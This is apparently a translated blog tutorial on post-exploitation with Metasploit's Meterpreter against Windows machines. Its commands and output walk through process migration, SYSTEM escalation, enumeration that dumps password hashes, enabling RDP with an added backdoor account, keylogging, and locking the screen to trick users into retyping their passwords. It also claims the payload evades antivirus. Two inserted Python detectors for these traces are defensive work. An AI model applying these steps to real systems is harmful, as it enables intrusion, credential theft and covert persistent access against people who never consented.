
Secrets of Meterpreter Payload

What is a meterpreter?

Meterpreter is an advanced, multi-functional payload that can be extended dynamically at run time. In practice this means it gives you a basic shell and lets you add new capabilities to it as needed.

The first and most common action is to migrate into another process, typically explorer.exe. This is done with the migrate command:

meterpreter > migrate 1888   # 1888 is the target PID; find it with ps
[*] Migrating to 1888...
[*] Migration completed successfully.


Next, as a rule, privileges are elevated to SYSTEM. The getsystem command does this, using a vulnerability that has been present in all versions of Windows since 3.1:
meterpreter > getsystem
...got system (via technique 1).


Information gathering

The next step after connecting to the machine is gathering information; Meterpreter simplifies this procedure with the winenum script:

meterpreter > run winenum
[*] Running Windows Local Enumerion Meterpreter Script
[*] New session on 192.168..:1197...
[*] Saving general report to /root/.msf4/logs/scripts/winenum/MICROSOF-30B51A_20111024.0931/MICROSOF-30B51A_20111024.0931.txt
[*] Output of each individual command is saved to /root/.msf4/logs/scripts/winenum/MICROSOF-30B51A_20111024.0931
[*] Checking if MICROSOF-30B51A is a Virtual Machine ........
[*] UAC is Disabled
[*] Running Command List ...
[*] running command net view
[*] running command netstat -ns
[*] running command net accounts
[*] running command netstat -vb
[*] running command route print
[*] running command netstat -nao
[*] running command ipconfig /all
[*] running command arp -a
[*] running command cmd.exe /c set
[*] running command ipconfig /displaydns
[*] running command tasklist /svc
[*] running command netsh firewall show config
[*] running command net group administrators
[*] running command net view /domain
[*] running command net localgroup administrators
[*] running command net localgroup
[*] running command net user
[*] running command net group
[*] running command net session
[*] running command net share
[*] running command gpresult /SCOPE USER /Z
[*] running command gpresult /SCOPE COMPUTER /Z
[*] Running WMIC Commands ....
[*] running command wmic netlogin get name,lastlogon,badpasswordcount
[*] running command wmic nteventlog get path,filename,writeable
[*] running command wmic netclient list brief
[*] running command wmic share get name,path
[*] running command wmic logicaldisk get description,filesystem,name,size
[*] running command wmic volume list brief
[*] running command wmic netuse get name,username,connectiontype,localname
[*] running command wmic service list brief
[*] running command wmic group list
[*] running command wmic useraccount list
[*] running command wmic qfe
[*] running command wmic product get name,version
[*] running command wmic rdtoggle list
[*] running command wmic startup list full
[*] Extracting software list from registry
[*] Dumping password hashes...
[*] Getting Tokens...
[*] All tokens have been processed
[*] Done!
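The enumeration above is noisy from the host's point of view: one parent process spawns a dozen different recon tools within seconds. The following added example (not code from the article or from Metasploit) flags such a burst in constructed process-creation records; the `RECON_TOOLS` set is taken from the "running command ..." lines above.

```python
"""Flag a winenum-style enumeration burst in process-creation telemetry.
Added example, not from the article. Input lines are constructed in the
shape <ISO time>|<parent pid>|<command line>; real Sysmon/4688 need a parser."""
from collections import defaultdict
from datetime import datetime, timedelta

# Tools winenum drives (from the "running command ..." lines above), plus the
# cmd builtin `set`, which winenum runs as `cmd.exe /c set`.
RECON_TOOLS = {"net", "netstat", "route", "ipconfig", "arp", "set",
               "tasklist", "netsh", "gpresult", "wmic"}

def recon_tool(cmdline):
    """Return the recon tool a command line launches, or None."""
    tokens = cmdline.strip().split()
    if len(tokens) > 2 and tokens[0].lower().endswith("cmd.exe") and tokens[1].lower() == "/c":
        tokens = tokens[2:]          # unwrap `cmd.exe /c <builtin>`
    name = tokens[0].rsplit("\\", 1)[-1].lower() if tokens else ""
    name = name[:-4] if name.endswith(".exe") else name
    return name if name in RECON_TOOLS else None

def find_bursts(lines, window=timedelta(seconds=60), threshold=6):
    """Map parent PID -> sorted distinct recon tools for parents that spawned
    at least `threshold` distinct recon tools inside one `window`."""
    by_parent = defaultdict(list)
    for line in lines:
        ts, ppid, cmd = line.split("|", 2)
        tool = recon_tool(cmd)
        if tool:
            by_parent[int(ppid)].append((datetime.fromisoformat(ts), tool))
    hits = {}
    for ppid, events in by_parent.items():
        events.sort()
        for i, (start, _) in enumerate(events):
            seen = {t for when, t in events[i:] if when - start <= window}
            if len(seen) >= threshold:
                hits[ppid] = sorted(seen)
                break
    return hits

SAMPLE_EVENTS = [  # constructed; 1888 is the explorer PID migrated into above
    "2011-10-24T09:31:02|1888|net view",
    "2011-10-24T09:31:03|1888|netstat -ns",
    "2011-10-24T09:31:03|1888|net accounts",
    "2011-10-24T09:31:05|1888|ipconfig /all",
    "2011-10-24T09:31:05|1888|arp -a",
    "2011-10-24T09:31:06|1888|cmd.exe /c set",
    "2011-10-24T09:31:07|1888|tasklist /svc",
    "2011-10-24T09:31:09|1888|wmic qfe",
    "2011-10-24T09:40:00|4100|ipconfig /all",   # a lone admin check: no alert
]
```

The threshold and window are tuning knobs: a single `ipconfig` from an administrator never trips the rule, but the script's fixed command list does every time.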


We get password hashes, system settings, a list of users and much more.
There is another script, scraper, that collects even more extensive information, including a registry dump, but it sometimes runs into problems, so I will not cover it here.

Remote Desktop

Gaining access to the remote desktop is of particular interest to us. Let us dwell on this in more detail, since we have all the means for it. The script that performs all the connection setup is called getgui. To enable the RDP protocol on the remote machine, use the -e parameter:

meterpreter > run getgui -e
[*] Windows Remote Desktop Configuration Meterpreter Script by Darkoperator
[*] Carlos Perez carlos_perez@darkoperator.com
[*] Enabling Remote Desktop
[*] RDP is already enabled
[*] Setting Terminal Services service startup mode
[*] Terminal Services service is already set to auto
[*] Opening port in local firewall if necessary
[*] For cleanup use command: run multi_console_command -rc /root/.msf4/logs/scripts/getgui/clean_up__20111024.1517.rc

Next we need to add a new user:

meterpreter > run getgui -u NAME -p PASSWORD
[*] Windows Remote Desktop Configuration Meterpreter Script by Darkoperator
[*] Carlos Perez carlos_perez@darkoperator.com
[*] Setting user account for logon
[*] Adding User: NAME with Password: PASSWORD
[*] Adding User: NAME to local group ' '
[*] Adding User: NAME to local group ' '
[*] You can now login with the created user
[*] For cleanup use command: run multi_console_command -rc /root/.msf4/logs/scripts/getgui/clean_up__20111024.1642.rc


Here NAME is the username and PASSWORD is its password.
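From the defender's side, the two getgui runs leave a recognisable trail: RDP switched on, then a fresh local account dropped straight into a privileged group. The following added example (not code from the article or from Metasploit) correlates those traces over constructed Windows event records; the event IDs 4720 and 4732 are standard Security log IDs, and treating a Sysmon registry write (ID 13) of fDenyTSConnections=0 as "RDP enabled" is an assumption about your telemetry.

```python
"""Correlate the traces getgui leaves: a new local account granted a privileged
group right after creation, with RDP enabled on the host around the same time.
Added example, not from the article. Events are constructed and simplified;
4720/4732 are the standard Security IDs (user created / member added to a local
group). Treating a Sysmon ID 13 write of fDenyTSConnections=0 as "RDP enabled"
is an assumption about your telemetry."""
from datetime import datetime, timedelta

PRIVILEGED_GROUPS = {"Administrators", "Remote Desktop Users"}
RDP_VALUE = r"HKLM\SYSTEM\CurrentControlSet\Control\Terminal Server\fDenyTSConnections"

def _when(ev):
    return datetime.fromisoformat(ev["time"])

def suspicious_accounts(events, window=timedelta(minutes=10)):
    """Map each account that was created and then added to a privileged group
    within `window` to its groups and whether RDP was enabled nearby."""
    events = sorted(events, key=_when)
    rdp_on = [_when(e) for e in events
              if e["id"] == 13 and e.get("target") == RDP_VALUE and e.get("value") == "0"]
    findings = {}
    for created in (e for e in events if e["id"] == 4720):
        user, t0 = created["user"], _when(created)
        groups = {e["group"] for e in events
                  if e["id"] == 4732 and e["user"] == user
                  and e["group"] in PRIVILEGED_GROUPS
                  and t0 <= _when(e) <= t0 + window}
        if groups:   # creation alone is routine; creation + privilege is the signal
            findings[user] = {
                "groups": sorted(groups),
                "rdp_enabled_nearby": any(abs(t0 - t) <= window for t in rdp_on),
            }
    return findings

SAMPLE_EVENTS = [  # constructed records, not real logs; NAME is the article's placeholder
    {"time": "2011-10-24T16:40:01", "id": 13, "target": RDP_VALUE, "value": "0"},
    {"time": "2011-10-24T16:42:10", "id": 4720, "user": "NAME"},
    {"time": "2011-10-24T16:42:11", "id": 4732, "user": "NAME", "group": "Remote Desktop Users"},
    {"time": "2011-10-24T16:42:11", "id": 4732, "user": "NAME", "group": "Administrators"},
    {"time": "2011-10-24T10:05:00", "id": 4720, "user": "intern"},  # plain account: no finding
    {"time": "2011-10-24T10:06:00", "id": 4732, "user": "intern", "group": "Users"},
]
```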

Getting a shell

If you need a shell on the remote machine, run the shell command. Alternatively, launch cmd manually.

Hardware operations

To disable the keyboard or mouse, use the uictl command. It takes the following parameters:

uictl [enable/disable] [keyboard/mouse]

enable turns the device on; disable turns it off.

meterpreter > uictl disable mouse
Disabling mouse...
meterpreter > uictl enable mouse
Enabling mouse...
meterpreter > uictl disable keyboard
Disabling keyboard...
meterpreter > uictl enable keyboard
Enabling keyboard...


Keylogger

There are two built-in keyloggers. One is simply a set of commands: keyscan_start starts the keylogger, keyscan_dump displays the captured keystrokes, and keyscan_stop stops the keylogger.

There is also a script called keylogrecorder. It is more efficient than keyscan and, moreover, writes the result to a log file:

meterpreter > bgrun keylogrecorder
[*] Executed Meterpreter with Job ID 2
meterpreter > [*] Starting the keystroke sniffer...
[*] Keystrokes being saved in to /root/.msf4/logs/scripts/keylogrecorder/192.168.._20111024.4455.txt
[*] Recording

meterpreter > bgkill 2
[*] Killing background job 2...


Ruby

Meterpreter also supports Ruby scripting. For example, we can display a message box (MessageBox) or lock the workstation. To do this, first load the railgun extension:

meterpreter > irb
> client.core.use("railgun")
=> true


Then, to lock the workstation:

> client.railgun.user32.LockWorkstation()
=> {"GetLastError" => 0, "return" => true}


This is often combined with a keylogger to obtain a user's password:

meterpreter > bgrun keylogrecorder
[*] Executed Meterpreter with Job ID 2
meterpreter > [*] Starting the keystroke sniffer...
[*] Keystrokes being saved in to /root/.msf4/logs/scripts/keylogrecorder/192.168.2.27_20111024.4455.txt
[*] Recording

meterpreter > irb
> client.core.use("railgun")
=> true
> client.railgun.user32.LockWorkstation()
=> {"GetLastError" => 0, "return" => true}


The user, assuming Windows has simply glitched, will type in the password, and we will see it in the keylogger log.

Displaying a dialog with a message is just as easy:

> client.railgun.user32.MessageBoxA(0, " ", "", "MB_OK")

More information about displaying such messages can be found on MSDN.

There is another interesting command, screenshot, which takes a screenshot of the remote machine's desktop. If you are working under Linux, Metasploit should be launched as root, since the screenshot is saved in the msf3 folder.

If you need to shut down or restart the machine, there are the shutdown and reboot commands. If shutdown or reboot does not work (this happens), kill the lsass.exe process; the system will then restart within a minute anyway:

meterpreter > kill 866   # 866 is the PID of lsass.exe; find it with ps

One more point. I tested Meterpreter on machines with various antivirus products and firewalls, in particular Outpost, Dr.Web and KIS. A full scan was run with the enhanced security modes enabled, but despite this Meterpreter went unnoticed.

Conclusion

Meterpreter is a great tool for remote control which, in addition to its large number of built-in tools, can be extended with new functionality. At the same time, it is completely invisible to most antiviruses (I did not check all of them, so I do not know for certain). There are, of course, separate tools for detecting it; for example, Symantec has released one that can be downloaded, but most ordinary users are not aware of what Meterpreter is and what threat it poses, so, IMHO, they will not download a separate product to detect it.

Source: https://habr.com/ru/post/131112/
